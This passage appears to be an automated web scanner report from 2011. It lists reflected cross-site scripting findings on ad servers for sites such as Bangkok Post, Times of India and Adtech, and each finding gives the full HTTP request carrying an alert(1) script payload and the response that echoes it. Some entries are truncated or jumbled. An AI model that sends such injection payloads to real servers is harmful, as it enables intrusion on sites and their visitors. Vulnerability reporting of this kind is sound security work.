This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&ee597"-alert(1)-"d76410964e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:42:52 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&ee597"-alert(1)-"d76410964e=1&s=2377409&_salt=2521144252";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba69c"><script>alert(1)</script>d6cde2c0778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&ba69c"><script>alert(1)</script>d6cde2c0778=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:42:52 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?Z=1x1&ba69c"><script>alert(1)</script>d6cde2c0778=1&s=2377409&_salt=2400931217&t=2" target="_parent">
...[SNIP]...

6.7. http://ads3.bangkokpost.co.th/www/delivery/spc.php [zones parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads3.bangkokpost.co.th
Path:	/www/delivery/spc.php

Issue detail

The value of the zones request parameter is copied into the HTML document as plain text between tags. The payload c8036<script>alert(1)</script>e65cf74873f was submitted in the zones parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/delivery/spc.php?zones=120%3D120%7C127%3D127%7C170%3D170%7Cc8036<script>alert(1)</script>e65cf74873f&nz=1&source=&r=29318038&charset=UTF-8&loc=http%3A//www.bangkokpost.com/&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news HTTP/1.1
Host: ads3.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:49 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:49 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:49 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:49 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:49 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Size: 1967
Vary: User-Agent,Accept-Encoding
Content-Length: 1967
Content-Type: application/x-javascript; charset=UTF-8

OA_output['120'] = '';

OA_output['127'] = '';

OA_output['170'] = '';

OA_output['c8036<script>alert(1)</script>e65cf74873f'] = '';
OA_output['c8036<script>alert(1)</script>e65cf74873f'] += "<"+"div
...[SNIP]...

6.8. http://ads4.bangkokpost.co.th/ads_server/iframe [FONT_COLOR parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads4.bangkokpost.co.th
Path:	/ads_server/iframe

Issue detail

The value of the FONT_COLOR request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb396'><script>alert(1)</script>87fd94cf478 was submitted in the FONT_COLOR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ads_server/iframe?&SITE=WEBDIRECTORY&AREA=SPONSOR_C&TYPE=SPONSOR+LINKS&POSITION=POSITION+A&METHOD=IFRAME&CATEGORY=BUSINESS&KEYWORD=&FONT_COLOR=ED7007eb396'><script>alert(1)</script>87fd94cf478&ACC_RANDOM=853121136? HTTP/1.1
Host: ads4.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:56:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 1326
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="t
...[SNIP]...
<h3 class="header" style='color:#ED7007eb396'><script>alert(1)</script>87fd94cf478'>
...[SNIP]...

6.9. http://ads4.bangkokpost.co.th/ads_server/iframe/ [FONT_COLOR parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads4.bangkokpost.co.th
Path:	/ads_server/iframe/

Issue detail

The value of the FONT_COLOR request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24c70'><script>alert(1)</script>60e7c2a3a40 was submitted in the FONT_COLOR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads_server/iframe/?&SITE=WEBDIRECTORY&AREA=SPONSOR_C&TYPE=SPONSOR+LINKS&POSITION=POSITION+D&METHOD=IFRAME&CATEGORY=BUSINESS&KEYWORD=&FONT_COLOR=ED700724c70'><script>alert(1)</script>60e7c2a3a40&ACC_RANDOM=646920734? HTTP/1.1
Host: ads4.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:56:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 1304
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="t
...[SNIP]...
<h3 class="header" style='color:#ED700724c70'><script>alert(1)</script>60e7c2a3a40'>
...[SNIP]...

6.10. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/addyn/3.0/5132/1305477/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 861bb'-alert(1)-'f21fb08044c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /addyn/3.0/5132/1305477/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=0.02706600772216916;misc=1315103192573;rdclick=http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=861bb'-alert(1)-'f21fb08044c HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 531

document.write('<a href="http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=861bb'-alert(1)-'f21fb08044chttp://adserver.adtechus.com/?adlink/5132/1305477/0/170/AdId=-3;BnId=0;itime=104221538;sub1=javascript;sub2=noauto;" target=_blank>
...[SNIP]...

6.11. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/addyn/3.0/5132/1305477/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 480d2'-alert(1)-'10715eeaf55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /addyn/3.0/5132/1305477/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=0.02706600772216916;misc=1315103192573;rdclick=http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=&480d2'-alert(1)-'10715eeaf55=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 534

document.write('<a href="http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=&480d2'-alert(1)-'10715eeaf55=1http://adserver.adtechus.com/?adlink/5132/1305477/0/170/AdId=-3;BnId=0;itime=104222794;sub1=javascript;sub2=noauto;" target=_blank>
...[SNIP]...

6.12. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

The value of the kvinvtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a5f1"><script>alert(1)</script>a3c894894fe was submitted in the kvinvtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=1002a5f1"><script>alert(1)</script>a3c894894fe HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 8844


<adFrames version="2.1" type="adFramesV2" ccid="1816855-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=100;a2534=100;a2544=100;a1834=100;agt18=100;agt25=100;agt35=1002a5f1"><script>alert(1)</script>a3c894894fe" invitationimp="http://adserver.adtechus.com/adcount/3.0/5108/1446938/0/16/AdId=1816855;BnId=1;ct=3889831121;st=911;adcid=1;itime=105695701;reqtype=25;;kr9570=173114;kp=101725" takeoverimp="http://ads
...[SNIP]...

6.13. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH [kvinvtype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe66f"-alert(1)-"fdfc71bda4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?fe66f"-alert(1)-"fdfc71bda4b=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:11:05 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1497
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html


...[SNIP]...

6.32. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159cc"><script>alert(1)</script>63443ecd52d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com159cc"><script>alert(1)</script>63443ecd52d/TOI2009_City_Mumbai/index.html/1507534702@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:21 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com159cc"><script>alert(1)</script>63443ecd52d/TOI2009_City_Mumbai/index.html/1338030623/Right1/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.33. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2536"><script>alert(1)</script>3ff82bbe964 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaia2536"><script>alert(1)</script>3ff82bbe964/index.html/1507534702@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:06 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaia2536"><script>alert(1)</script>3ff82bbe964/index.html/277548516/Right1/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.34. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc58c"><script>alert(1)</script>7884baacf04 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmlfc58c"><script>alert(1)</script>7884baacf04/1507534702@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:45 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmlfc58c"><script>alert(1)</script>7884baacf04/1532419946/Right1/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.35. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5454f"><script>alert(1)</script>7e19e9d2405 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/5454f"><script>alert(1)</script>7e19e9d2405? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:31 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/5454f"><script>alert(1)</script>7e19e9d2405/1598055187/UNKNOWN/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.36. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d8e8"-alert(1)-"d7ff56f32e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1?8d8e8"-alert(1)-"d7ff56f32e0=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:11:11 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1498
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html


...[SNIP]...

6.37. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0bc"><script>alert(1)</script>41f3675278 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1?3a0bc"><script>alert(1)</script>41f3675278=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:11:09 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1526
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<!--
